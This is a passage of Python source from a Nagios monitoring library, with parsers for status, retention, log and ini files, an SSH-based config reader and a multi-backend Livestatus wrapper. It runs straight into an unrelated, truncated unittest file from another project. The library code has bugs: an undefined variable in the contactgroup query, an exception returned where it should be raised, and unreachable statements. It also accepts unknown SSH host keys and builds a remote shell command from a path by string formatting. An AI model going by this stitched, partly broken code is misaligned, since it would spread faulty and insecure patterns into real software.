        """ Performs a GET query for a particular contactgroup

        This performs::

            '''GET contactgroups
            Filter: contactgroup_name = %s''' % contactgroup_name

        Args:

            contactgroup_name: name of the contactgroup to obtain livestatus data from

        Returns:

            Answer from livestatus in python format.

        """
        return self.query('GET contactgroups', 'Filter: name = %s' % name)[0]


class RetentionDat(object):

    """ Easy way to parse the content of retention.dat

    After calling parse() contents of retention.dat are kept in self.data

    Example Usage::

        r = retention()
        r.parse()
        print r
        print r.data['info']
    """

    def __init__(self, filename=None, cfg_file=None):
        """ Initilize a new instance of retention.dat

        Args (you only need to provide one of these):

            filename: path to your retention.dat file

            cfg_file: path to your nagios.cfg file, path to retention.dat will
            be looked up in this file

        """
        # If filename is not provided, lets try to discover it from
        # nagios.cfg
        if filename is None:
            c = config(cfg_file=cfg_file)
            for key, value in c._load_static_file():
                if key == "state_retention_file":
                    filename = value

        self.filename = filename
        self.data = None

    def parse(self):
        """ Parses your status.dat file and stores in a dictionary under self.data

        Returns:

            None

        Raises:

            :py:class:`ParserError`: if problem arises while reading status.dat

            :py:class:`ParserError`: if status.dat is not found

            :py:class:`IOError`: if status.dat cannot be read
        """
        self.data = {}
        status = {}  # Holds all attributes of a single item
        key = None  # if within definition, store everything before =
        value = None  # if within definition, store everything after =
        if not self.filename:
            raise ParserError("status.dat file not found")
        lines = open(self.filename, 'rb').readlines()
        for sequence_no, line in enumerate(lines):
            line_num = sequence_no + 1
            # Cleanup and line skips
            line = line.strip()
            if line == "":
                pass
            elif line[0] == "#" or line[0] == ';':
                pass
            elif line.find("{") != -1:
                status = {}
                status['meta'] = {}
                status['meta']['type'] = line.split("{")[0].strip()
            elif line.find("}") != -1:
                # Status definition has finished, lets add it to
                # self.data
                if status['meta']['type'] not in self.data:
                    self.data[status['meta']['type']] = []
                self.data[status['meta']['type']].append(status)
            else:
                tmp = line.split("=", 1)
                if len(tmp) == 2:
                    (key, value) = line.split("=", 1)
                    status[key] = value
                elif key == "long_plugin_output":
                    # special hack for long_output support. We get here if:
                    # * line does not contain {
                    # * line does not contain }
                    # * line does not contain =
                    # * last line parsed started with long_plugin_output=
                    status[key] += "\n" + line
                else:
                    raise ParserError("Error on %s:%s: Could not parse line: %s" % (self.filename, line_num, line))

    def __setitem__(self, key, item):
        self.data[key] = item

    def __getitem__(self, key):
        return self.data[key]

    def __str__(self):
        if not self.data:
            self.parse()
        str_buffer = "# Generated by pynag"
        for datatype, datalist in self.data.items():
            for item in datalist:
                str_buffer += "%s {\n" % datatype
                for attr, value in item.items():
                    str_buffer += "%s=%s\n" % (attr, value)
                str_buffer += "}\n"
        return str_buffer


class StatusDat(RetentionDat):

    """ Easy way to parse status.dat file from nagios

    After calling parse() contents of status.dat are kept in status.data
    Example usage::

        >>> s = status()
        >>> s.parse()
        >>> keys = s.data.keys()
        >>> 'info' in keys
        True
        >>> 'programstatus' in keys
        True
        >>> for service in s.data.get('servicestatus',[]):
        ...     host_name=service.get('host_name', None)
        ...     description=service.get('service_description',None)

    """

    def __init__(self, filename=None, cfg_file=None):
        """ Initilize a new instance of status

        Args (you only need to provide one of these):

            filename: path to your status.dat file

            cfg_file: path to your nagios.cfg file, path to status.dat will be
            looked up in this file

        """
        # If filename is not provided, lets try to discover it from
        # nagios.cfg
        if filename is None:
            c = config(cfg_file=cfg_file)
            for key, value in c._load_static_file():
                if key == "status_file":
                    filename = value

        self.filename = filename
        self.data = None

    def get_contactstatus(self, contact_name):
        """ Returns a dictionary derived from status.dat for one particular contact

        Args:

            contact_name: `contact_name` field of the contact's status.dat data
            to parse and return as a dict.

        Returns:

            dict derived from status.dat for the contact.

        Raises:

            ValueError if object is not found

        Example:

            >>> s = status()
            >>> s.get_contactstatus(contact_name='invalid_contact')
            ValueError('invalid_contact',)
            >>> first_contact = s.data['contactstatus'][0]['contact_name']
            >>> s.get_contactstatus(first_contact)['contact_name'] == first_contact
            True
        """
        if self.data is None:
            self.parse()
        for i in self.data['contactstatus']:
            if i.get('contact_name') == contact_name:
                return i
        return ValueError(contact_name)

    def get_hoststatus(self, host_name):
        """ Returns a dictionary derived from status.dat for one particular contact

        Args:

            host_name: `host_name` field of the host's status.dat data
            to parse and return as a dict.

        Returns:

            dict derived from status.dat for the host.

        Raises:

            ValueError if object is not found
        """
        if self.data is None:
            self.parse()
        for i in self.data['hoststatus']:
            if i.get('host_name') == host_name:
                return i
        raise ValueError(host_name)

    def get_servicestatus(self, host_name, service_description):
        """ Returns a dictionary derived from status.dat for one particular service

        Args:

            service_name: `service_name` field of the host's status.dat data
            to parse and return as a dict.

        Returns:

            dict derived from status.dat for the service.

        Raises:

            ValueError if object is not found
        """
        if self.data is None:
            self.parse()
        for i in self.data['servicestatus']:
            if i.get('host_name') == host_name:
                if i.get('service_description') == service_description:
                    return i
        raise ValueError(host_name, service_description)


class ObjectCache(Config):

    """ Loads the configuration as it appears in objects.cache file """

    def get_cfg_files(self):
        for k, v in self.maincfg_values:
            if k == 'object_cache_file':
                return [v]


class ParserError(Exception):

    """ ParserError is used for errors that the Parser has when parsing config.

    Typical usecase when there is a critical error while trying to read configuration.
    """
    filename = None
    line_start = None
    message = None

    def __init__(self, message, item=None):
        """ Creates an instance of ParserError

        Args:

            message: Message to be printed by the error

            item: Pynag item who caused the error

        """
        self.message = message
        if item is None:
            return
        self.item = item
        self.filename = item['meta']['filename']
        self.line_start = item['meta'].get('line_start')

    def __str__(self):
        message = self.message
        if self.filename and self.line_start:
            message = '%s in %s, line %s' % (message, self.filename, self.line_start)
        return repr(message)


class ConfigFileNotFound(ParserError):

    """ This exception is thrown if we cannot locate any nagios.cfg-style config file. """
    pass


class LivestatusNotConfiguredException(ParserError):

    """ This exception is raised if we tried to autodiscover path to livestatus and failed """


class LogFiles(object):

    """ Parses Logfiles defined in nagios.cfg and allows easy access to its content

    Content is stored in python-friendly arrays of dicts. Output should be more
    or less compatible with mk_livestatus log output
    """

    def __init__(self, maincfg=None):
        self.config = config(maincfg)

        self.log_file = self.config.get_cfg_value('log_file')
        self.log_archive_path = self.config.get_cfg_value('log_archive_path')

    def get_log_entries(self, start_time=None, end_time=None, strict=True, search=None, **kwargs):
        """ Get Parsed log entries for given timeperiod.

         Args:
            start_time: unix timestamp. if None, return all entries from today

            end_time: If specified, only fetch log entries older than this (unix
            timestamp)

            strict: If True, only return entries between start_time and
            end_time, if False, then return entries that belong to same log
            files as given timeset

            search: If provided, only return log entries that contain this
            string (case insensitive)

            kwargs: All extra arguments are provided as filter on the log
            entries. f.e. host_name="localhost"

         Returns:

            List of dicts
        """
        now = time.time()
        if end_time is None:
            end_time = now
        if start_time is None:
            if 'filename' in kwargs:
                start_time = 1
            else:
                seconds_in_a_day = 60 * 60 * 24
                seconds_today = end_time % seconds_in_a_day  # midnight of today
                start_time = end_time - seconds_today
        start_time = int(start_time)
        end_time = int(end_time)

        logfiles = self.get_logfiles()
        if 'filename' in kwargs:
            logfiles = filter(lambda x: x == kwargs.get('filename'), logfiles)

        # If start time was provided, skip all files that we last modified
        # before start_time
        if start_time:
            logfiles = filter(lambda x: start_time <= os.stat(x).st_mtime, logfiles)

        # Log entries are returned in ascending order, which is the opposite of
        # what get_logfiles returns.
        logfiles.reverse()

        result = []
        for log_file in logfiles:
            entries = self._parse_log_file(filename=log_file)
            if len(entries) == 0:
                continue
            first_entry = entries[0]
            last_entry = entries[-1]

            if first_entry['time'] > end_time:
                continue
                # If strict, filter entries to only include the ones in the timespan
            if strict is True:
                entries = [x for x in entries if x['time'] >= start_time and x['time'] <= end_time]
                # If search string provided, filter the string
            if search is not None:
                entries = [x for x in entries if x['message'].lower().find(search.lower()) > -1]
            for k, v in kwargs.items():
                entries = [x for x in entries if x.get(k) == v]
            result += entries

            if start_time is None or int(start_time) >= int(first_entry.get('time')):
                continue

        # Now, logfiles should in MOST cases come sorted for us.
        # However we rely on modification time of files and if it is off,
        # We want to make sure log entries are coming in the correct order.
        # The following sort should not impact performance in the typical use case.
        result.sort(key=lambda x: x.get('time'))

        return result

    def get_logfiles(self):
        """ Returns a list with the fullpath to every log file used by nagios.

        Lists are sorted by modification times. Newest logfile is at the front
        of the list so usually nagios.log comes first, followed by archivelogs

        Returns:

            List of strings

        """
        logfiles = []

        for filename in os.listdir(self.log_archive_path):
            full_path = "%s/%s" % (self.log_archive_path, filename)
            logfiles.append(full_path)
        logfiles.append(self.log_file)

        # Sort the logfiles by modification time, newest file at the front
        compare_mtime = lambda a, b: os.stat(a).st_mtime < os.stat(b).st_mtime
        logfiles.sort(key=lambda x: int(os.stat(x).st_mtime))

        # Newest logfiles go to the front of the list
        logfiles.reverse()

        return logfiles

    def get_flap_alerts(self, **kwargs):
        """ Same as :py:meth:`get_log_entries`, except return timeperiod transitions.

        Takes same parameters.
        """
        return self.get_log_entries(class_name="timeperiod transition", **kwargs)

    def get_notifications(self, **kwargs):
        """ Same as :py:meth:`get_log_entries`, except return only notifications.
        Takes same parameters.
        """
        return self.get_log_entries(class_name="notification", **kwargs)

    def get_state_history(self, start_time=None, end_time=None, host_name=None, strict=True, service_description=None):
        """ Returns a list of dicts, with the state history of hosts and services.

        Args:

           start_time: unix timestamp. if None, return all entries from today

           end_time: If specified, only fetch log entries older than this (unix
           timestamp)

           host_name: If provided, only return log entries that contain this
           string (case insensitive)

           service_description: If provided, only return log entries that contain this
           string (case insensitive)

        Returns:

            List of dicts with state history of hosts and services
        """

        log_entries = self.get_log_entries(start_time=start_time, end_time=end_time, strict=strict, class_name='alerts')
        result = []
        last_state = {}
        now = time.time()

        for line in log_entries:
            if 'state' not in line:
                continue
            line['duration'] = now - int(line.get('time'))
            if host_name is not None and host_name != line.get('host_name'):
                continue
            if service_description is not None and service_description != line.get('service_description'):
                continue
            if start_time is None:
                start_time = int(line.get('time'))

            short_name = "%s/%s" % (line['host_name'], line['service_description'])
            if short_name in last_state:
                last = last_state[short_name]
                last['end_time'] = line['time']
                last['duration'] = last['end_time'] - last['time']
                line['previous_state'] = last['state']
            last_state[short_name] = line

            if strict is True:
                if start_time is not None and int(start_time) > int(line.get('time')):
                    continue
                if end_time is not None and int(end_time) < int(line.get('time')):
                    continue

            result.append(line)
        return result

    def _parse_log_file(self, filename=None):
        """ Parses one particular nagios logfile into arrays of dicts.

        Args:

            filename: Log file to be parsed. If is None, then log_file from
            nagios.cfg is used.

        Returns:

            A list of dicts containing all data from the log file
        """
        if filename is None:
            filename = self.log_file
        result = []
        for line in open(filename).readlines():
            parsed_entry = self._parse_log_line(line)
            if parsed_entry != {}:
                parsed_entry['filename'] = filename
                result.append(parsed_entry)
        return result

    def _parse_log_line(self, line):
        """ Parse one particular line in nagios logfile and return a dict.

        Args:

            line: Line of the log file to be parsed.

        Returns:

            dict containing the information from the log file line.
        """
        host = None
        service_description = None
        state = None
        check_attempt = None
        plugin_output = None
        contact = None

        m = re.search('^\[(.*?)\] (.*?): (.*)', line)
        if m is None:
            return {}
        line = line.strip()
        timestamp, logtype, options = m.groups()

        result = {}
        try:
            timestamp = int(timestamp)
        except ValueError:
            timestamp = 0
        result['time'] = int(timestamp)
        result['type'] = logtype
        result['options'] = options
        result['message'] = line
        result['class'] = 0  # unknown
        result['class_name'] = 'unclassified'
        if logtype in ('CURRENT HOST STATE', 'CURRENT SERVICE STATE', 'SERVICE ALERT', 'HOST ALERT'):
            result['class'] = 1
            result['class_name'] = 'alerts'
            if logtype.find('HOST') > -1:
                # This matches host current state:
                m = re.search('(.*?);(.*?);(.*);(.*?);(.*)', options)
                if m is None:
                    return result
                host, state, hard, check_attempt, plugin_output = m.groups()
                service_description = None
            if logtype.find('SERVICE') > -1:
                m = re.search('(.*?);(.*?);(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                host, service_description, state, hard, check_attempt, plugin_output = m.groups()
            result['host_name'] = host
            result['service_description'] = service_description
            result['state'] = int(pynag.Plugins.state[state])
            result['check_attempt'] = check_attempt
            result['plugin_output'] = plugin_output
            result['text'] = plugin_output
        elif "NOTIFICATION" in logtype:
            result['class'] = 3
            result['class_name'] = 'notification'
            if logtype == 'SERVICE NOTIFICATION':
                m = re.search('(.*?);(.*?);(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                contact, host, service_description, state, command, plugin_output = m.groups()
            elif logtype == 'HOST NOTIFICATION':
                m = re.search('(.*?);(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                contact, host, state, command, plugin_output = m.groups()
                service_description = None
            result['contact_name'] = contact
            result['host_name'] = host
            result['service_description'] = service_description
            try:
                result['state'] = int(pynag.Plugins.state[state])
            except Exception:
                result['state'] = -1
            result['plugin_output'] = plugin_output
            result['text'] = plugin_output
        elif logtype == "EXTERNAL COMMAND":
            result['class'] = 5
            result['class_name'] = 'command'
            m = re.search('(.*?);(.*)', options)
            if m is None:
                return result
            command_name, text = m.groups()
            result['command_name'] = command_name
            result['text'] = text
        elif logtype in ('PASSIVE SERVICE CHECK', 'PASSIVE HOST CHECK'):
            result['class'] = 4
            result['class_name'] = 'passive'
            if logtype.find('HOST') > -1:
                # This matches host current state:
                m = re.search('(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                host, state, plugin_output = m.groups()
                service_description = None
            if logtype.find('SERVICE') > -1:
                m = re.search('(.*?);(.*?);(.*?);(.*)', options)
                if m is None:
                    return result
                host, service_description, state, plugin_output = m.groups()
            result['host_name'] = host
            result['service_description'] = service_description
            result['state'] = state
            result['plugin_output'] = plugin_output
            result['text'] = plugin_output
        elif logtype in ('SERVICE FLAPPING ALERT', 'HOST FLAPPING ALERT'):
            result['class_name'] = 'flapping'
        elif logtype == 'TIMEPERIOD TRANSITION':
            result['class_name'] = 'timeperiod_transition'
        elif logtype == 'Warning':
            result['class_name'] = 'warning'
            result['state'] = "1"
            result['text'] = options
        if 'text' not in result:
            result['text'] = result['options']
        result['log_class'] = result['class']  # since class is a python keyword
        return result


class ExtraOptsParser(object):

    """ Get Nagios Extra-Opts from a config file as specified by http://nagiosplugins.org/extra-opts

    We could ALMOST use pythons ConfParser but nagios plugin team thought it would be a
    good idea to support multiple values per key, so a dict datatype no longer works.

    Its a shame because we have to make our own "ini" parser as a result

    Usage::

        # cat /etc/nagios/plugins.ini
        [main]
        host_name = localhost
        [other section]
        host_name = example.com
        # EOF

        e = ExtraOptsParser(section_name='main', config_file='/etc/nagios/plugins.ini')
        e.get('host_name')  # returns "localhost"
        e.get_values()  # Returns a dict of all the extra opts
        e.getlist('host_name')  # returns all values of host_name (if more than one were specified) in a list

    """
    standard_locations = [
        "/etc/nagios/plugins.ini",
        "/usr/local/nagios/etc/plugins.ini",
        "/usr/local/etc/nagios/plugins.ini",
        "/etc/opt/nagios/plugins.ini",
        "/etc/nagios-plugins.ini",
        "/usr/local/etc/nagios-plugins.ini",
        "/etc/opt/nagios-plugins.ini",
    ]

    def __init__(self, section_name=None, config_file=None):
        if not section_name:
            section_name = self.get_default_section_name()
        if not config_file:
            config_file = self.get_default_config_file()
        self.section_name = section_name
        self.config_file = config_file
        self._all_options = self.parse_file(filename=config_file) or {}

    def get_values(self):
        """ Returns a dict with all extra-options with the granted section_name and config_file

        Results are in the form of::

            {
              'key': ["possible","values"]
            }
        """
        return self._all_options.get(self.section_name, {})

    def get_default_section_name(self):
        """ According to extra-opts standard, the default should be filename of check script being run """
        return os.path.basename(sys.argv[0])

    def get_default_config_file(self):
        """ Return path to first readable extra-opt config-file found

        According to the nagiosplugins extra-opts spec the search method is as follows:

            1. Search for nagios.ini or nagios-plugins.ini in : splitted variable NAGIOS_CONFIG_PATH
            2. Search in a predefined list of files
            3. Return None if no config file is found

        The method works as follows:

        To quote the spec on NAGIOS_CONFIG_PATH:

            *"To use a custom location, set a NAGIOS_CONFIG_PATH environment
            variable to the set of directories that should be checked (this is a
            colon-separated list just like PATH). The first plugins.ini or
            nagios-plugins.ini file found in these directories will be used."*

        """
        search_path = []
        nagios_config_path = os.environ.get('NAGIOS_CONFIG_PATH', '')
        for path in nagios_config_path.split(':'):
            search_path.append(os.path.join(path, 'plugins.ini'))
            search_path.append(os.path.join(path, 'nagios-plugins.ini'))

        search_path += self.standard_locations
        self.search_path = search_path
        for path in search_path:
            if os.path.isfile(path):
                return path
        return None

    def get(self, option_name, default=_sentinel):
        """ Return the value of one specific option

        Args:

            option_name: The value set to this option will be returned

        Returns:

            The value of `option_name`

        Raises:

            :py:class:`ValueError` when `option_name` cannot be found in options

        """
        result = self.getlist(option_name, default)

        # If option was not found, raise error
        if result == _sentinel:
            raise ValueError("Option named %s was not found" % (option_name))
        elif result == default:
            return result
        elif not result:
            # empty list
            return result
        else:
            return result[0]

    def getlist(self, option_name, default=_sentinel):
        """ Return a list of all values for option_name

        Args:

            option_name: All the values set to this option will be returned

        Returns:

            List containing all the options set to `option_name`

        Raises:

            :py:class:`ValueError` when `option_name` cannot be found in options

        """
        result = self.get_values().get(option_name, default)
        if result == _sentinel:
            raise ValueError("Option named %s was not found" % (option_name))
        return result

    def parse_file(self, filename):
        """ Parses an ini-file and returns a dict of the ini values.

        The datatype returned is a list of sections where each section is a
        dict of values.

        Args:

            filename: Full path to the ini-file to be parsed.

        Example the following the file::

            [main]
            name = this is a name
            key = value
            key = value2

        Would return::

            [
              {'main':
                {
                  'name': ['this is a name'],
                  'key': [value, value2]
                }
              },
            ]

        """
        if filename is None:
            return {}

        f = open(filename)
        try:
            data = f.read()
            return self.parse_string(data)
        finally:
            f.close()

    def parse_string(self, string):
        """ Parses a string that is supposed to be ini-style format.

        See :py:meth:`parse_file` for more info

        Args:

            string: String to be parsed. Should be in ini-file format.

        Returns:

            Dictionnary containing all the sections of the ini-file and their
            respective data.

        Raises:

            :py:class:`ParserError` when line does not follow the ini format.

        """
        sections = {}
        # When parsing inside a section, the name of it stored here.
        section_name = None
        current_section = pynag.Utils.defaultdict(dict)

        for line_no, line, in enumerate(string.splitlines()):
            line = line.strip()

            # skip empty lines
            if not line or line[0] in ('#', ';'):
                continue

            # Check if this is a new section
            if line.startswith('[') and line.endswith(']'):
                section_name = line.strip('[').strip(']').strip()
                current_section = pynag.Utils.defaultdict(list)
                sections[section_name] = current_section
                continue

            # All entries should have key=value format
            if not '=' in line:
                error = "Line %s should be in the form of key=value format (got '%s' instead)" % (line_no, line)
                raise ParserError(error)

            # If we reach here, we parse current line into key and a value section
            key, value = line.split('=', 1)
            key = key.strip()
            value = value.strip()

            sections[section_name][key].append(value)
        return sections


class SshConfig(Config):

    """ Parse object configuration files from remote host via ssh

    Uses python-paramiko for ssh connections.
    """

    def __init__(self, host, username, password=None, cfg_file=None):
        """ Creates a SshConfig instance

        Args:

            host: Host to connect to

            username: User to connect with

            password: Password for `username`

            cfg_file: Nagios main cfg file
        """
        import paramiko
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.ssh.connect(host, username=username, password=password)
        self.ftp = self.ssh.open_sftp()

        import cStringIO
        c = cStringIO.StringIO()
        self.tar = tarfile.open(mode='w', fileobj=c)

        self.cached_stats = {}
        super(SshConfig, self).__init__(cfg_file=cfg_file)

    def open(self, filename, *args, **kwargs):
        """ Behaves like file.open only, via ssh connection """
        return self.tar.extractfile(filename)
        tarinfo = self._get_file(filename)
        string = tarinfo.tobuf()
        print string
        return StringIO.StringIO(string)
        return self.tar.extractfile(tarinfo)

    def add_to_tar(self, path):
        """
        """
        print "Taring ", path
        command = "find '{path}' -type f | tar -c -T - --to-stdout --absolute-names"
        command = command.format(path=path)
        print command
        stdin, stdout, stderr = self.ssh.exec_command(command, bufsize=50000)
        tar = tarfile.open(fileobj=stdout, mode='r|')
        if not self.tar:
            self.tar = tar
            # return
        else:
            for i in tar:
                self.tar.addfile(i)

    def is_cached(self, filename):
        if not self.tar:
            return False
        return filename in self.tar.getnames()

    def _get_file(self, filename):
        """ Download filename and return the TarInfo object """
        if filename not in self.tar.getnames():
            self.add_to_tar(filename)
        return self.tar.getmember(filename)

    def get_cfg_files(self):
        cfg_files = []
        for config_object, config_value in self.maincfg_values:

            # Add cfg_file objects to cfg file list
            if config_object == "cfg_file":
                config_value = self.abspath(config_value)
                if self.isfile(config_value):
                    cfg_files.append(config_value)
            elif config_object == "cfg_dir":
                absolut_path = self.abspath(config_value)
                command = "find '%s' -type f -iname \*cfg" % (absolut_path)
                stdin, stdout, stderr = self.ssh.exec_command(command)
                raw_filelist = stdout.read().splitlines()
                cfg_files += raw_filelist
            else:
                continue
            if not self.is_cached(config_value):
                self.add_to_tar(config_value)
        return cfg_files

    def isfile(self, path):
        """ Behaves like os.path.isfile only, via ssh connection """
        try:
            copy = self._get_file(path)
            return copy.isfile()
        except IOError:
            return False

    def isdir(self, path):
        """ Behaves like os.path.isdir only, via ssh connection """
        try:
            file_stat = self.stat(path)
            return stat.S_ISDIR(file_stat.st_mode)
        except IOError:
            return False

    def islink(self, path):
        """ Behaves like os.path.islink only, via ssh connection """
        try:
            file_stat = self.stat(path)
            return stat.S_ISLNK(file_stat.st_mode)
        except IOError:
            return False

    def readlink(self, path):
        """ Behaves like os.readlink only, via ssh connection """
        return self.ftp.readlink(path)

    def stat(self, *args, **kwargs):
        """ Wrapper around os.stat only, via ssh connection """
        path = args[0]
        if not self.is_cached(path):
            self.add_to_tar(path)
        if path not in self.tar.getnames():
            raise IOError("No such file or directory %s" % path)
        member = self.tar.getmember(path)
        member.st_mode = member.mode
        member.st_mtime = member.mtime
        return member

    def access(self, *args, **kwargs):
        """ Wrapper around os.access only, via ssh connection """
        return os.access(*args, **kwargs)

    def exists(self, path):
        """ Wrapper around os.path.exists only, via ssh connection """
        try:
            self.ftp.stat(path)
            return True
        except IOError:
            return False

    def listdir(self, *args, **kwargs):
        """ Wrapper around os.listdir  but via ssh connection """
        stats = self.ftp.listdir_attr(*args, **kwargs)
        for i in stats:
            self.cached_stats[args[0] + "/" + i.filename] = i
        files = map(lambda x: x.filename, stats)
        return files


class MultiSite(Livestatus):

    """ Wrapps around multiple Livesatus instances and aggregates the results
        of queries.

        Example:
            >>> m = MultiSite()
            >>> m.add_backend(path='/var/spool/nagios/livestatus.socket', name='local')
            >>> m.add_backend(path='127.0.0.1:5992', name='remote')
    """

    def __init__(self, *args, **kwargs):
        super(MultiSite, self).__init__(*args, **kwargs)
        self.backends = {}

    def add_backend(self, path, name):
        """ Add a new livestatus backend to this instance.

         Arguments:
            path (str):  Path to file socket or remote address
            name (str):  Friendly shortname for this backend
        """
        backend = Livestatus(
            livestatus_socket_path=path,
            nagios_cfg_file=self.nagios_cfg_file,
            authuser=self.authuser
        )
        self.backends[name] = backend

    def get_backends(self):
        """ Returns a list of mk_livestatus instances

        Returns:
            list. List of mk_livestatus instances
        """
        return self.backends

    def get_backend(self, backend_name):
        """ Return one specific backend that has previously been added
        """
        if not backend_name:
            return self.backends.values()[0]
        try:
            return self.backends[backend_name]
        except KeyError:
            raise ParserError("No backend found with name='%s'" % backend_name)

    def query(self, query, *args, **kwargs):
        """ Behaves like mk_livestatus.query() except results are aggregated from multiple backends

        Arguments:
            backend (str): If specified, fetch only data from this backend (see add_backend())
            *args:         Passed directly to mk_livestatus.query()
            **kwargs:      Passed directly to mk_livestatus.query()
        """
        result = []
        backend = kwargs.pop('backend', None)

        # Special hack, if 'Stats' argument was provided to livestatus
        # We have to maintain compatibility with old versions of livestatus
        # and return single list with all results instead of a list of dicts
        doing_stats = any(map(lambda x: x.startswith('Stats:'), args + (query,)))

        # Iterate though all backends and run the query
        # TODO: Make this multithreaded
        for name, backend_instance in self.backends.items():
            # Skip if a specific backend was requested and this is not it
            if backend and backend != name:
                continue

            query_result = backend_instance.query(query, *args, **kwargs)
            if doing_stats:
                result = self._merge_statistics(result, query_result)
            else:
                for row in query_result:
                    row['backend'] = name
                    result.append(row)

        return result

    def _merge_statistics(self, list1, list2):
        """ Merges multiple livestatus results into one result

        Arguments:
            list1 (list): List of integers
            list2 (list): List of integers

        Returns:
            list. Aggregated results of list1 + list2
        Example:
            >>> result1 = [1,1,1,1]
            >>> result2 = [2,2,2,2]
            >>> MultiSite()._merge_statistics(result1, result2)
            [3, 3, 3, 3]
        """
        if not list1:
            return list2
        if not list2:
            return list1

        number_of_columns = len(list1)
        result = [0] * number_of_columns
        for row in (list1, list2):
            for i, column in enumerate(row):
                result[i] += column
        return result

    def get_host(self, host_name, backend=None):
        """ Same as Livestatus.get_host() """
        backend = self.get_backend(backend)
        return backend.get_host(host_name)

    def get_service(self, host_name, service_description, backend=None):
        """ Same as Livestatus.get_service() """
        backend = self.get_backend(backend)
        return backend.get_service(host_name, service_description)

    def get_contact(self, contact_name, backend=None):
        """ Same as Livestatus.get_contact() """
        backend = self.get_backend(backend)
        return backend.get_contact(contact_name)

    def get_contactgroup(self, contactgroup_name, backend=None):
        """ Same as Livestatus.get_contact() """
        backend = self.get_backend(backend)
        return backend.get_contactgroup(contactgroup_name)

    def get_servicegroup(self, servicegroup_name, backend=None):
        """ Same as Livestatus.get_servicegroup() """
        backend = self.get_backend(backend)
        return backend.get_servicegroup(servicegroup_name)

    def get_hostgroup(self, hostgroup_name, backend=None):
        """ Same as Livestatus.get_hostgroup() """
        backend = self.get_backend(backend)
        return backend.get_hostgroup(hostgroup_name)


class config(Config):

    """ This class is here only for backwards compatibility. Use Config instead. """


class mk_livestatus(Livestatus):

    """ This class is here only for backwards compatibility. Use Livestatus instead. """


class object_cache(ObjectCache):

    """ This class is here only for backwards compatibility. Use ObjectCache instead. """


class status(StatusDat):

    """ This class is here only for backwards compatibility. Use StatusDat instead. """


class retention(RetentionDat):

    """ This class is here only for backwards compatibility. Use RetentionDat instead. """


if __name__ == '__main__':
    import time
    start = time.time()
    ssh = SshConfig(host='status.adagios.org', username='palli')
    ssh.ssh.get_transport().window_size = 3 * 1024 * 1024
    ssh.ssh.get_transport().use_compression()

    # ssh.add_to_tar('/etc/nagios')
    # sys.exit()
    # ssh.ssh.exec_command("/bin/ls")
    print "before reset"
    ssh.parse()
    end = time.time()
    print "duration=", end - start
    bland = ssh.tar.getmember('/etc/nagios/okconfig/hosts/web-servers/bland.is-http.cfg')
    print bland.tobuf()
    sys.exit(0)
    print "ssh up"
    ssh_conn = FastTransport(('status.adagios.org', 22))
    ssh_conn.connect(username='palli')
    ftp = paramiko.SFTPClient.from_transport(ssh_conn)
    print "connected" \
          ""
    ssh.ssh = ssh_conn
    ssh.ftp = ftp
    print "starting parse"
    print "done parsing"

#!/usr/bin/env python

import unittest

from werkzeug.exceptions import NotFound, Forbidden

from tests.logic_t.layer.LogicLayer.util import generate_ll


class TaskPrioritizeBeforeLogicLayerTest(unittest.TestCase):
    def setUp(self):
        self.ll = generate_ll()
        self.pl = self.ll.pl

    def test_add_prioritize_before_adds_prioritize_before(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

        # when
        results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_already_added_still_succeeds(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        t1.prioritize_before.append(t2)
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)

        # when
        results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(1, len(t1.prioritize_before))
        self.assertEqual(1, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertTrue(t2 in t1.prioritize_before)
        self.assertTrue(t1 in t2.prioritize_after)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_null_ids_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
                          None, t2.id, user)

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
                          t1.id, None, user)

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
                          None, None, user)

        # then
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))

    def test_null_user_raises_exception(self):
        # given
